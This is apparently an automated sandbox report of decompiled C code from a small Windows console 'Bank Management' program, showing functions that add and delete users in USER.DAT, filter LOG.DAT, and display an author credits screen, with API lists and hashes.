                                                                      				char _v51;
                                                                      				char _v52;
                                                                      				char _v84;
                                                                      				char _v116;
                                                                      				char _v129;
                                                                      				char _v139;
                                                                      				char _v154;
                                                                      				char _v188;
                                                                      				void* __ebp;
                                                                      				intOrPtr _t47;
                                                                      				void* _t49;
                                                                      				char _t54;
                                                                      				intOrPtr _t56;
                                                                      				void* _t58;
                                                                      				intOrPtr _t62;
                                                                      				void* _t65;
                                                                      				intOrPtr _t67;
                                                                      				intOrPtr _t75;
                                                                      				intOrPtr _t79;
                                                                      				intOrPtr _t80;
                                                                      				intOrPtr _t83;
                                                                      				void* _t86;
                                                                      				void* _t88;
                                                                      				intOrPtr _t92;
                                                                      				intOrPtr _t93;
                                                                      				intOrPtr _t94;
                                                                      				intOrPtr _t96;
                                                                      				intOrPtr _t99;
                                                                      				intOrPtr _t105;
                                                                      				intOrPtr _t107;
                                                                      				intOrPtr _t109;
                                                                      				void* _t118;
                                                                      				void* _t122;
                                                                      				void* _t123;
                                                                      				void* _t124;
                                                                      				void* _t125;
                                                                      				void* _t127;
                                                                      				void* _t128;
                                                                      				void* _t132;
                                                                      				void* _t133;
                                                                      				void* _t139;
                                                                      
                                                                      				_t146 = __fp0;
                                                                      				_t117 = __esi;
                                                                      				_t116 = __edi;
                                                                      				_t89 = __ebx;
                                                                      				_v52 = 0;
                                                                      				_v51 = 0;
                                                                      				_v47 = 0;
                                                                      				_v43 = 0;
                                                                      				_v39 = 0;
                                                                      				_v35 = 0;
                                                                      				_v31 = 0;
                                                                      				_v27 = 0;
                                                                      				_v23 = 0;
                                                                      				_v12 = 0;
                                                                      				E00BE20E0(__ecx, __edi, __esi, 0, __fp0);
                                                                      				E00BE12B0(0x19, 8);
                                                                      				_push("User Name  : ");
                                                                      				E00BE715C(__ebx, __edi, __esi, 0);
                                                                      				E00BE738B("%s", 0xc02ee4);
                                                                      				E00BE12B0(0x19, 0xa);
                                                                      				_push("Password  : ");
                                                                      				E00BE715C(__ebx, __edi, __esi, 0);
                                                                      				E00BE12F0(_t116, _t117,  &_v52);
                                                                      				_t47 = E00BE6EF1("USER.DAT", "r");
                                                                      				_t122 = _t118 + 0x18;
                                                                      				 *0xc02f28 = _t47;
                                                                      				while(1) {
                                                                      					_push( &_v116);
                                                                      					_push( &_v84);
                                                                      					_t92 =  *0xc02f28; // 0x0
                                                                      					_t49 = E00BE7021(_t92, "%s %s %s\n", 0xc02ee0);
                                                                      					_t123 = _t122 + 0x14;
                                                                      					if(_t49 == 0xffffffff) {
                                                                      						break;
                                                                      					}
                                                                      					_t86 = E00BE8230(0xc02ee4,  &_v84);
                                                                      					_t122 = _t123 + 8;
                                                                      					if(_t86 == 0) {
                                                                      						_t88 = E00BE8230(0xc02f02,  &_v116);
                                                                      						_t122 = _t122 + 8;
                                                                      						if(_t88 == 0) {
                                                                      							_v12 = _v12 + 1;
                                                                      						}
                                                                      					}
                                                                      				}
                                                                      				_t105 =  *0xc02f28; // 0x0
                                                                      				_push(_t105);
                                                                      				E00BE6DB6(_t89, _t116, _t117, __eflags);
                                                                      				_t124 = _t123 + 4;
                                                                      				E00BE20E0(_t92, _t116, _t117, __eflags, _t146);
                                                                      				__eflags = _v12;
                                                                      				if(__eflags != 0) {
                                                                      					E00BE12B0(0xf, 0xa);
                                                                      					_push("Are you sure you want to DELETE this user? <Y/N> : ");
                                                                      					E00BE715C(_t89, _t116, _t117, __eflags);
                                                                      					_t125 = _t124 + 4;
                                                                      					_t54 = _v5;
                                                                      					__eflags = _t54 - 0x59;
                                                                      					if(_t54 == 0x59) {
                                                                      						L10:
                                                                      						 *0xc02f28 = E00BE6EF1("USER.DAT", "r");
                                                                      						_t56 = E00BE6EF1("temp.dat", "a");
                                                                      						_t127 = _t125 + 0x10;
                                                                      						 *0xc02f20 = _t56;
                                                                      						while(1) {
                                                                      							_push( &_v116);
                                                                      							_push( &_v84);
                                                                      							_t93 =  *0xc02f28; // 0x0
                                                                      							_t58 = E00BE7021(_t93, "%s %s %s\n", 0xc02ee0);
                                                                      							_t128 = _t127 + 0x14;
                                                                      							__eflags = _t58 - 0xffffffff;
                                                                      							if(__eflags == 0) {
                                                                      								break;
                                                                      							}
                                                                      							_t79 = E00BE8230(0xc02ee4,  &_v84);
                                                                      							_t139 = _t128 + 8;
                                                                      							__eflags = _t79;
                                                                      							if(__eflags != 0) {
                                                                      								L14:
                                                                      								_push( &_v116);
                                                                      								_push( &_v84);
                                                                      								_push(0xc02ee0);
                                                                      								_push("%s %s %s\n");
                                                                      								_t80 =  *0xc02f20; // 0x0
                                                                      								_push(_t80);
                                                                      								E00BE6F06(_t89, _t116, _t117, __eflags);
                                                                      								_t127 = _t139 + 0x14;
                                                                      								L15:
                                                                      								continue;
                                                                      							}
                                                                      							_t83 = E00BE8230(0xc02f02,  &_v116);
                                                                      							_t127 = _t139 + 8;
                                                                      							__eflags = _t83;
                                                                      							if(__eflags == 0) {
                                                                      								goto L15;
                                                                      							}
                                                                      							goto L14;
                                                                      						}
                                                                      						_t94 =  *0xc02f28; // 0x0
                                                                      						_push(_t94);
                                                                      						E00BE6DB6(_t89, _t116, _t117, __eflags);
                                                                      						_t107 =  *0xc02f20; // 0x0
                                                                      						_push(_t107);
                                                                      						E00BE6DB6(_t89, _t116, _t117, __eflags);
                                                                      						 *0xc02f28 = E00BE6EF1("LOG.DAT", "r");
                                                                      						_t62 = E00BE6EF1("temp.dat", "w");
                                                                      						_t132 = _t128 + 0x18;
                                                                      						 *0xc02f20 = _t62;
                                                                      						while(1) {
                                                                      							_push( &_v129);
                                                                      							_push( &_v139);
                                                                      							_push( &_v154);
                                                                      							_t96 =  *0xc02f28; // 0x0
                                                                      							_t65 = E00BE7021(_t96, "%s %s %s %s",  &_v188);
                                                                      							_t133 = _t132 + 0x18;
                                                                      							__eflags = _t65 - 0xffffffff;
                                                                      							if(__eflags == 0) {
                                                                      								break;
                                                                      							}
                                                                      							E00BF7CF2( &_v188);
                                                                      							E00BF7CF2( &_v20);
                                                                      							_t75 = E00BE8230( &_v188,  &_v20);
                                                                      							_t132 = _t133 + 0x10;
                                                                      							__eflags = _t75;
                                                                      							if(__eflags != 0) {
                                                                      								_push( &_v129);
                                                                      								_push( &_v139);
                                                                      								_push( &_v154);
                                                                      								_push( &_v188);
                                                                      								_push("%s %s %s %s\n");
                                                                      								_t99 =  *0xc02f20; // 0x0
                                                                      								_push(_t99);
                                                                      								E00BE6F06(_t89, _t116, _t117, __eflags);
                                                                      								_t132 = _t132 + 0x18;
                                                                      							}
                                                                      						}
                                                                      						_t109 =  *0xc02f28; // 0x0
                                                                      						_push(_t109);
                                                                      						E00BE6DB6(_t89, _t116, _t117, __eflags);
                                                                      						_t67 =  *0xc02f20; // 0x0
                                                                      						_push(_t67);
                                                                      						E00BE6DB6(_t89, _t116, _t117, __eflags);
                                                                      						E00BE20E0(_t96, _t116, _t117, __eflags, _t146);
                                                                      						E00BE12B0(0x19, 0xa);
                                                                      						_push("Record DELETED successfully!");
                                                                      						return E00BE715C(_t89, _t116, _t117, __eflags);
                                                                      					}
                                                                      					__eflags = _v5 - 0x79;
                                                                      					if(_v5 != 0x79) {
                                                                      						return _t54;
                                                                      					}
                                                                      					goto L10;
                                                                      				}
                                                                      				E00BE12B0(0xa, 0xa);
                                                                      				_push(0xbff4fc);
                                                                      				return E00BE715C(_t89, _t116, _t117, __eflags);
                                                                      			}






















































                                                                      0x00be2800
                                                                      0x00be2800
                                                                      0x00be2800
                                                                      0x00be2800
                                                                      0x00be2809
                                                                      0x00be280f
                                                                      0x00be2812
                                                                      0x00be2815
                                                                      0x00be2818
                                                                      0x00be281b
                                                                      0x00be281e
                                                                      0x00be2821
                                                                      0x00be2824
                                                                      0x00be2827
                                                                      0x00be282e
                                                                      0x00be2837
                                                                      0x00be283c
                                                                      0x00be2841
                                                                      0x00be2853
                                                                      0x00be285f
                                                                      0x00be2864
                                                                      0x00be2869
                                                                      0x00be2875
                                                                      0x00be2884
                                                                      0x00be2889
                                                                      0x00be288c
                                                                      0x00be2891
                                                                      0x00be2894
                                                                      0x00be2898
                                                                      0x00be28a3
                                                                      0x00be28aa
                                                                      0x00be28af
                                                                      0x00be28b5
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00be28c0
                                                                      0x00be28c5
                                                                      0x00be28ca
                                                                      0x00be28d5
                                                                      0x00be28da
                                                                      0x00be28df
                                                                      0x00be28e7
                                                                      0x00be28e7
                                                                      0x00be28df
                                                                      0x00be28ea
                                                                      0x00be28ec
                                                                      0x00be28f2
                                                                      0x00be28f3
                                                                      0x00be28f8
                                                                      0x00be28fb
                                                                      0x00be2900
                                                                      0x00be2904
                                                                      0x00be2925
                                                                      0x00be292a
                                                                      0x00be292f
                                                                      0x00be2934
                                                                      0x00be2937
                                                                      0x00be293b
                                                                      0x00be293e
                                                                      0x00be294d
                                                                      0x00be295f
                                                                      0x00be296e
                                                                      0x00be2973
                                                                      0x00be2976
                                                                      0x00be297b
                                                                      0x00be297e
                                                                      0x00be2982
                                                                      0x00be298d
                                                                      0x00be2994
                                                                      0x00be2999
                                                                      0x00be299c
                                                                      0x00be299f
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00be29aa
                                                                      0x00be29af
                                                                      0x00be29b2
                                                                      0x00be29b4
                                                                      0x00be29cb
                                                                      0x00be29ce
                                                                      0x00be29d2
                                                                      0x00be29d3
                                                                      0x00be29d8
                                                                      0x00be29dd
                                                                      0x00be29e2
                                                                      0x00be29e3
                                                                      0x00be29e8
                                                                      0x00be29eb
                                                                      0x00000000
                                                                      0x00be29eb
                                                                      0x00be29bf
                                                                      0x00be29c4
                                                                      0x00be29c7
                                                                      0x00be29c9
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00be29c9
                                                                      0x00be29ed
                                                                      0x00be29f3
                                                                      0x00be29f4
                                                                      0x00be29fc
                                                                      0x00be2a02
                                                                      0x00be2a03
                                                                      0x00be2a1d
                                                                      0x00be2a2c
                                                                      0x00be2a31
                                                                      0x00be2a34
                                                                      0x00be2a39
                                                                      0x00be2a3c
                                                                      0x00be2a43
                                                                      0x00be2a4a
                                                                      0x00be2a57
                                                                      0x00be2a5e
                                                                      0x00be2a63
                                                                      0x00be2a66
                                                                      0x00be2a69
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00be2a72
                                                                      0x00be2a7e
                                                                      0x00be2a91
                                                                      0x00be2a96
                                                                      0x00be2a99
                                                                      0x00be2a9b
                                                                      0x00be2aa0
                                                                      0x00be2aa7
                                                                      0x00be2aae
                                                                      0x00be2ab5
                                                                      0x00be2ab6
                                                                      0x00be2abb
                                                                      0x00be2ac1
                                                                      0x00be2ac2
                                                                      0x00be2ac7
                                                                      0x00be2ac7
                                                                      0x00be2aca
                                                                      0x00be2acf
                                                                      0x00be2ad5
                                                                      0x00be2ad6
                                                                      0x00be2ade
                                                                      0x00be2ae3
                                                                      0x00be2ae4
                                                                      0x00be2aec
                                                                      0x00be2af5
                                                                      0x00be2afa
                                                                      0x00000000
                                                                      0x00be2b04
                                                                      0x00be2944
                                                                      0x00be2947
                                                                      0x00be2b0a
                                                                      0x00be2b0a
                                                                      0x00000000
                                                                      0x00be2947
                                                                      0x00be290a
                                                                      0x00be290f
                                                                      0x00000000

                                                                      APIs
                                                                        • Part of subcall function 00BE20E0: _wprintf.LIBCMT ref: 00BE20FF
                                                                        • Part of subcall function 00BE20E0: _wprintf.LIBCMT ref: 00BE213E
                                                                        • Part of subcall function 00BE20E0: _wprintf.LIBCMT ref: 00BE215F
                                                                        • Part of subcall function 00BE20E0: __wstrtime.LIBCMT ref: 00BE216C
                                                                        • Part of subcall function 00BE20E0: _wprintf.LIBCMT ref: 00BE2188
                                                                        • Part of subcall function 00BE20E0: __wstrtime.LIBCMT ref: 00BE2195
                                                                        • Part of subcall function 00BE20E0: _wprintf.LIBCMT ref: 00BE21C8
                                                                        • Part of subcall function 00BE12B0: GetStdHandle.KERNEL32(000000F5,00000000,?,00BE1393,?,?,?,00BE1233), ref: 00BE12D1
                                                                        • Part of subcall function 00BE12B0: SetConsoleCursorPosition.KERNEL32(00000000,?,00BE1393,?,?,?,00BE1233), ref: 00BE12D8
                                                                      • _wprintf.LIBCMT ref: 00BE2841
                                                                      • _wscanf.LIBCMT ref: 00BE2853
                                                                        • Part of subcall function 00BE738B: _vwscanf.LIBCMT ref: 00BE739C
                                                                      • _wprintf.LIBCMT ref: 00BE2869
                                                                        • Part of subcall function 00BE715C: __stbuf.LIBCMT ref: 00BE71A8
                                                                        • Part of subcall function 00BE715C: __output_s_l.LIBCMT ref: 00BE71C2
                                                                        • Part of subcall function 00BE715C: __ftbuf.LIBCMT ref: 00BE71D6
                                                                        • Part of subcall function 00BE12F0: _wprintf.LIBCMT ref: 00BE1329
                                                                        • Part of subcall function 00BE6EF1: __fsopen.LIBCMT ref: 00BE6EFC
                                                                      • _swscanf.LIBCMT ref: 00BE28AA
                                                                        • Part of subcall function 00BE7021: _vfscanf.LIBCMT ref: 00BE7035
                                                                      • _wprintf.LIBCMT ref: 00BE2914
                                                                      • _wprintf.LIBCMT ref: 00BE292F
                                                                      • _swscanf.LIBCMT ref: 00BE2994
                                                                      • _fprintf.LIBCMT ref: 00BE29E3
                                                                      • _swscanf.LIBCMT ref: 00BE2A5E
                                                                      • _fprintf.LIBCMT ref: 00BE2AC2
                                                                      • _wprintf.LIBCMT ref: 00BE2AFF
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.224908255.0000000000BE1000.00000020.00020000.sdmp, Offset: 00BE0000, based on PE: true
                                                                      • Associated: 00000001.00000002.224904531.0000000000BE0000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.224920014.0000000000BF8000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.224925639.0000000000BFF000.00000008.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.224930208.0000000000C05000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: _wprintf$_swscanf$__wstrtime_fprintf$ConsoleCursorHandlePosition__fsopen__ftbuf__output_s_l__stbuf_vfscanf_vwscanf_wscanf
                                                                      • String ID: %s %s %s$%s %s %s$%s %s %s$%s %s %s %s$%s %s %s %s$Are you sure you want to DELETE this user? <Y/N> : $LOG.DAT$Password : $Record DELETED successfully!$USER.DAT$USER.DAT$User Name : $temp.dat$temp.dat
                                                                      • API String ID: 3163849712-4002591224
                                                                      • Opcode ID: 3e267e05dab8b1be00bde71925b3e570eb644698295203f2de891da79f9f024e
                                                                      • Instruction ID: dd7a13ec91f709b5e9ceaa33ab2ac6cee02ec04cb4340658f614a3c06943cf36
                                                                      • Opcode Fuzzy Hash: 3e267e05dab8b1be00bde71925b3e570eb644698295203f2de891da79f9f024e
                                                                      • Instruction Fuzzy Hash: 4A71A8B2D402596ADB10EBE59C43FBE73F8AB25740F0441B9F605A62D2FB71960CC762
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 80%
                                                                      			E00BE25C0(void* __ebx, void* __edi, void* __esi, void* __fp0) {
                                                                      				char _v8;
                                                                      				char _v12;
                                                                      				char _v15;
                                                                      				char _v19;
                                                                      				char _v23;
                                                                      				char _v27;
                                                                      				char _v31;
                                                                      				char _v35;
                                                                      				char _v39;
                                                                      				char _v43;
                                                                      				char _v44;
                                                                      				char _v47;
                                                                      				char _v51;
                                                                      				char _v55;
                                                                      				char _v59;
                                                                      				char _v63;
                                                                      				char _v67;
                                                                      				char _v71;
                                                                      				char _v75;
                                                                      				char _v76;
                                                                      				char _v108;
                                                                      				char _v140;
                                                                      				void* __ebp;
                                                                      				intOrPtr _t42;
                                                                      				void* _t44;
                                                                      				intOrPtr _t53;
                                                                      				intOrPtr _t58;
                                                                      				intOrPtr _t67;
                                                                      				void* _t70;
                                                                      				void* _t73;
                                                                      				intOrPtr _t75;
                                                                      				intOrPtr _t76;
                                                                      				intOrPtr _t79;
                                                                      				void* _t83;
                                                                      				void* _t84;
                                                                      				void* _t85;
                                                                      				void* _t88;
                                                                      				void* _t89;
                                                                      				void* _t90;
                                                                      				void* _t103;
                                                                      
                                                                      				_t103 = __fp0;
                                                                      				_t84 = __esi;
                                                                      				_t83 = __edi;
                                                                      				_t73 = __ebx;
                                                                      				_v8 = 0;
                                                                      				_v12 = 0;
                                                                      				_v76 = 0;
                                                                      				_v75 = 0;
                                                                      				_v71 = 0;
                                                                      				_v67 = 0;
                                                                      				_v63 = 0;
                                                                      				_v59 = 0;
                                                                      				_v55 = 0;
                                                                      				_v51 = 0;
                                                                      				_v47 = 0;
                                                                      				_v44 = 0;
                                                                      				_t74 = 0;
                                                                      				_v43 = 0;
                                                                      				_v39 = 0;
                                                                      				_v35 = 0;
                                                                      				_v31 = 0;
                                                                      				_v27 = 0;
                                                                      				_v23 = 0;
                                                                      				_v19 = 0;
                                                                      				_v15 = 0;
                                                                      				do {
                                                                      					E00BE20E0(_t74, _t83, _t84, 0, _t103);
                                                                      					_v8 = 0;
                                                                      					E00BE12B0(0x19, 8);
                                                                      					_push("User Name        : ");
                                                                      					E00BE715C(_t73, _t83, _t84, 0);
                                                                      					E00BE738B("%s", 0xc02ee4);
                                                                      					_t42 = E00BE6EF1("USER.DAT", "r");
                                                                      					_t88 = _t85 + 0x14;
                                                                      					 *0xc02f28 = _t42;
                                                                      					_v12 = 0;
                                                                      					while(1) {
                                                                      						_push( &_v140);
                                                                      						_push( &_v108);
                                                                      						_t75 =  *0xc02f28; // 0x0
                                                                      						_t44 = E00BE7021(_t75, "%s %s %s\n", 0xc02ee0);
                                                                      						_t89 = _t88 + 0x14;
                                                                      						if(_t44 == 0xffffffff) {
                                                                      							goto L6;
                                                                      						}
                                                                      						_t70 = E00BE8230( &_v108, 0xc02ee4);
                                                                      						_t88 = _t89 + 8;
                                                                      						if(_t70 == 0) {
                                                                      							_v12 = _v12 + 1;
                                                                      						}
                                                                      					}
                                                                      					L6:
                                                                      					_t74 =  *0xc02f28; // 0x0
                                                                      					_push(_t74);
                                                                      					E00BE6DB6(_t73, _t83, _t84, __eflags);
                                                                      					_t90 = _t89 + 4;
                                                                      					__eflags = _v12;
                                                                      					if(__eflags == 0) {
                                                                      						E00BE12B0(0x19, 0xa);
                                                                      						_push("Password         : ");
                                                                      						E00BE715C(_t73, _t83, _t84, __eflags);
                                                                      						E00BE12F0(_t83, _t84,  &_v76);
                                                                      						E00BE12B0(0x19, 0xc);
                                                                      						_push("Confirm Password : ");
                                                                      						E00BE715C(_t73, _t83, _t84, __eflags);
                                                                      						_t74 =  &_v44;
                                                                      						E00BE12F0(_t83, _t84,  &_v44);
                                                                      						_t53 = E00BE8230(0xc02f02,  &_v44);
                                                                      						_t85 = _t90 + 0x10;
                                                                      						__eflags = _t53;
                                                                      						if(__eflags != 0) {
                                                                      							E00BE20E0( &_v44, _t83, _t84, __eflags, _t103);
                                                                      							E00BE12B0(0xa, 0xa);
                                                                      							_push(0xbff444);
                                                                      							E00BE715C(_t73, _t83, _t84, __eflags);
                                                                      							_t85 = _t85 + 4;
                                                                      							_t67 = _v8 + 1;
                                                                      							__eflags = _t67;
                                                                      							_v8 = _t67;
                                                                      						}
                                                                      					} else {
                                                                      						E00BE12B0(0xa, 0xa);
                                                                      						_push(0xbff3e0);
                                                                      						E00BE715C(_t73, _t83, _t84, __eflags);
                                                                      						_t85 = _t90 + 4;
                                                                      						_v8 = _v8 + 1;
                                                                      					}
                                                                      					__eflags = _v8;
                                                                      				} while (__eflags != 0);
                                                                      				 *0xc02f28 = E00BE6EF1("USER.DAT", 0xbff474);
                                                                      				_t76 =  *0xc02f28; // 0x0
                                                                      				_push(_t76);
                                                                      				E00BE6DB6(_t73, _t83, _t84, __eflags);
                                                                      				 *0xc02f28 = E00BE6EF1("USER.DAT", "a");
                                                                      				_push(0xc02f02);
                                                                      				_push(0xc02ee4);
                                                                      				_push(0xc02ee0);
                                                                      				_push("%s %s %s\n");
                                                                      				_t79 =  *0xc02f28; // 0x0
                                                                      				_push(_t79);
                                                                      				E00BE6F06(_t73, _t83, _t84, __eflags);
                                                                      				_t58 =  *0xc02f28; // 0x0
                                                                      				_push(_t58);
                                                                      				E00BE6DB6(_t73, _t83, _t84, __eflags);
                                                                      				E00BE20E0(_t76, _t83, _t84, __eflags, _t103);
                                                                      				E00BE12B0(0x19, 0xa);
                                                                      				_push("Record ADDED successfully!");
                                                                      				return E00BE715C(_t73, _t83, _t84, __eflags);
                                                                      			}











































                                                                      0x00be25c0
                                                                      0x00be25c0
                                                                      0x00be25c0
                                                                      0x00be25c0
                                                                      0x00be25c9
                                                                      0x00be25d0
                                                                      0x00be25d7
                                                                      0x00be25dd
                                                                      0x00be25e0
                                                                      0x00be25e3
                                                                      0x00be25e6
                                                                      0x00be25e9
                                                                      0x00be25ec
                                                                      0x00be25ef
                                                                      0x00be25f2
                                                                      0x00be25f5
                                                                      0x00be25f9
                                                                      0x00be25fb
                                                                      0x00be25fe
                                                                      0x00be2601
                                                                      0x00be2604
                                                                      0x00be2607
                                                                      0x00be260a
                                                                      0x00be260d
                                                                      0x00be2610
                                                                      0x00be2613
                                                                      0x00be2613
                                                                      0x00be2618
                                                                      0x00be2623
                                                                      0x00be2628
                                                                      0x00be262d
                                                                      0x00be263f
                                                                      0x00be2651
                                                                      0x00be2656
                                                                      0x00be2659
                                                                      0x00be265e
                                                                      0x00be2665
                                                                      0x00be266b
                                                                      0x00be266f
                                                                      0x00be267a
                                                                      0x00be2681
                                                                      0x00be2686
                                                                      0x00be268c
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00be2697
                                                                      0x00be269c
                                                                      0x00be26a1
                                                                      0x00be26a9
                                                                      0x00be26a9
                                                                      0x00be26ac
                                                                      0x00be26ae
                                                                      0x00be26ae
                                                                      0x00be26b4
                                                                      0x00be26b5
                                                                      0x00be26ba
                                                                      0x00be26bd
                                                                      0x00be26c1
                                                                      0x00be26e8
                                                                      0x00be26ed
                                                                      0x00be26f2
                                                                      0x00be26fe
                                                                      0x00be2707
                                                                      0x00be270c
                                                                      0x00be2711
                                                                      0x00be2719
                                                                      0x00be271d
                                                                      0x00be272b
                                                                      0x00be2730
                                                                      0x00be2733
                                                                      0x00be2735
                                                                      0x00be2737
                                                                      0x00be2740
                                                                      0x00be2745
                                                                      0x00be274a
                                                                      0x00be274f
                                                                      0x00be2755
                                                                      0x00be2755
                                                                      0x00be2758
                                                                      0x00be2758
                                                                      0x00be26c3
                                                                      0x00be26c7
                                                                      0x00be26cc
                                                                      0x00be26d1
                                                                      0x00be26d6
                                                                      0x00be26df
                                                                      0x00be26df
                                                                      0x00be275b
                                                                      0x00be275b
                                                                      0x00be2777
                                                                      0x00be277c
                                                                      0x00be2782
                                                                      0x00be2783
                                                                      0x00be279d
                                                                      0x00be27a2
                                                                      0x00be27a7
                                                                      0x00be27ac
                                                                      0x00be27b1
                                                                      0x00be27b6
                                                                      0x00be27bc
                                                                      0x00be27bd
                                                                      0x00be27c5
                                                                      0x00be27ca
                                                                      0x00be27cb
                                                                      0x00be27d3
                                                                      0x00be27dc
                                                                      0x00be27e1
                                                                      0x00be27f1

                                                                      APIs
                                                                        • Part of subcall function 00BE20E0: _wprintf.LIBCMT ref: 00BE20FF
                                                                        • Part of subcall function 00BE20E0: _wprintf.LIBCMT ref: 00BE213E
                                                                        • Part of subcall function 00BE20E0: _wprintf.LIBCMT ref: 00BE215F
                                                                        • Part of subcall function 00BE20E0: __wstrtime.LIBCMT ref: 00BE216C
                                                                        • Part of subcall function 00BE20E0: _wprintf.LIBCMT ref: 00BE2188
                                                                        • Part of subcall function 00BE20E0: __wstrtime.LIBCMT ref: 00BE2195
                                                                        • Part of subcall function 00BE20E0: _wprintf.LIBCMT ref: 00BE21C8
                                                                        • Part of subcall function 00BE12B0: GetStdHandle.KERNEL32(000000F5,00000000,?,00BE1393,?,?,?,00BE1233), ref: 00BE12D1
                                                                        • Part of subcall function 00BE12B0: SetConsoleCursorPosition.KERNEL32(00000000,?,00BE1393,?,?,?,00BE1233), ref: 00BE12D8
                                                                      • _wprintf.LIBCMT ref: 00BE262D
                                                                      • _wscanf.LIBCMT ref: 00BE263F
                                                                        • Part of subcall function 00BE738B: _vwscanf.LIBCMT ref: 00BE739C
                                                                        • Part of subcall function 00BE6EF1: __fsopen.LIBCMT ref: 00BE6EFC
                                                                      • _swscanf.LIBCMT ref: 00BE2681
                                                                        • Part of subcall function 00BE7021: _vfscanf.LIBCMT ref: 00BE7035
                                                                      • _wprintf.LIBCMT ref: 00BE26D1
                                                                      • _wprintf.LIBCMT ref: 00BE26F2
                                                                      • _wprintf.LIBCMT ref: 00BE2711
                                                                      • _wprintf.LIBCMT ref: 00BE274A
                                                                      • _fprintf.LIBCMT ref: 00BE27BD
                                                                      • _wprintf.LIBCMT ref: 00BE27E6
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.224908255.0000000000BE1000.00000020.00020000.sdmp, Offset: 00BE0000, based on PE: true
                                                                      • Associated: 00000001.00000002.224904531.0000000000BE0000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.224920014.0000000000BF8000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.224925639.0000000000BFF000.00000008.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.224930208.0000000000C05000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: _wprintf$__wstrtime$ConsoleCursorHandlePosition__fsopen_fprintf_swscanf_vfscanf_vwscanf_wscanf
                                                                      • String ID: %s %s %s$%s %s %s$Confirm Password : $Password : $Record ADDED successfully!$USER.DAT$USER.DAT$USER.DAT$User Name :
                                                                      • API String ID: 3917209068-3252730458
                                                                      • Opcode ID: 3db220c6ab6506e561510b04be0d62cf3761a09038d99e832a46aebb03ebc071
                                                                      • Instruction ID: 340017823bc09db03cf8fa578e0473c88c5f3efa0779e94c28764daaae2dda68
                                                                      • Opcode Fuzzy Hash: 3db220c6ab6506e561510b04be0d62cf3761a09038d99e832a46aebb03ebc071
                                                                      • Instruction Fuzzy Hash: 43518EB1E80349ABDB10EBA5DC47BAD76F06F15744F1440B9F604B62C1EBB09648C76A
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 73%
                                                                      			E00BE21E0(void* __ecx, void* __edi, void* __esi, void* __eflags) {
                                                                      				intOrPtr _v8;
                                                                      				void* __ebp;
                                                                      				void* _t28;
                                                                      				intOrPtr _t31;
                                                                      				void* _t34;
                                                                      				void* _t35;
                                                                      				void* _t36;
                                                                      
                                                                      				_t33 = __esi;
                                                                      				_t32 = __edi;
                                                                      				E00BE1380(__edi, __esi, __eflags, 0, 0, 0x50, 0x17);
                                                                      				E00BE12B0(0x1b, 4);
                                                                      				_push("BANK MANAGEMENT //");
                                                                      				E00BE715C(_t28, __edi, __esi, __eflags);
                                                                      				_t35 = _t34 + 4;
                                                                      				E00BE12B0(0x19, 5);
                                                                      				_v8 = 0;
                                                                      				while(1) {
                                                                      					_t42 = _v8 - 0x1b;
                                                                      					if(_v8 >= 0x1b) {
                                                                      						break;
                                                                      					}
                                                                      					_push(0xc4);
                                                                      					_push("%c");
                                                                      					E00BE715C(_t28, _t32, _t33, _t42);
                                                                      					_t35 = _t35 + 8;
                                                                      					_v8 = _v8 + 1;
                                                                      				}
                                                                      				E00BE12B0(0x19, 8);
                                                                      				_push("Designed and Programmed by:");
                                                                      				E00BE715C(_t28, _t32, _t33, __eflags);
                                                                      				_t36 = _t35 + 4;
                                                                      				E00BE12B0(0x19, 9);
                                                                      				_v8 = 0;
                                                                      				while(1) {
                                                                      					__eflags = _v8 - 0x1b;
                                                                      					if(__eflags >= 0) {
                                                                      						break;
                                                                      					}
                                                                      					_push(0xc4);
                                                                      					_push("%c");
                                                                      					E00BE715C(_t28, _t32, _t33, __eflags);
                                                                      					_t36 = _t36 + 8;
                                                                      					_t31 = _v8 + 1;
                                                                      					__eflags = _t31;
                                                                      					_v8 = _t31;
                                                                      				}
                                                                      				E00BE12B0(0x21, 0xb);
                                                                      				_push("Ravi Agrawal");
                                                                      				E00BE715C(_t28, _t32, _t33, __eflags);
                                                                      				E00BE12B0(0x21, 0xd);
                                                                      				_push("Sagar Sharma");
                                                                      				E00BE715C(_t28, _t32, _t33, __eflags);
                                                                      				E00BE12B0(0x21, 0xf);
                                                                      				_push("Sawal Maskey");
                                                                      				E00BE715C(_t28, _t32, _t33, __eflags);
                                                                      				E00BE12B0(0x18, 0x14);
                                                                      				_push("Press Any key to continue...");
                                                                      				return E00BE715C(_t28, _t32, _t33, __eflags);
                                                                      			}










                                                                      0x00be21e0
                                                                      0x00be21e0
                                                                      0x00be21ec
                                                                      0x00be21f5
                                                                      0x00be21fa
                                                                      0x00be21ff
                                                                      0x00be2204
                                                                      0x00be220b
                                                                      0x00be2210
                                                                      0x00be2222
                                                                      0x00be2222
                                                                      0x00be2226
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00be2228
                                                                      0x00be222d
                                                                      0x00be2232
                                                                      0x00be2237
                                                                      0x00be221f
                                                                      0x00be221f
                                                                      0x00be2240
                                                                      0x00be2245
                                                                      0x00be224a
                                                                      0x00be224f
                                                                      0x00be2256
                                                                      0x00be225b
                                                                      0x00be226d
                                                                      0x00be226d
                                                                      0x00be2271
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00be2273
                                                                      0x00be2278
                                                                      0x00be227d
                                                                      0x00be2282
                                                                      0x00be2267
                                                                      0x00be2267
                                                                      0x00be226a
                                                                      0x00be226a
                                                                      0x00be228b
                                                                      0x00be2290
                                                                      0x00be2295
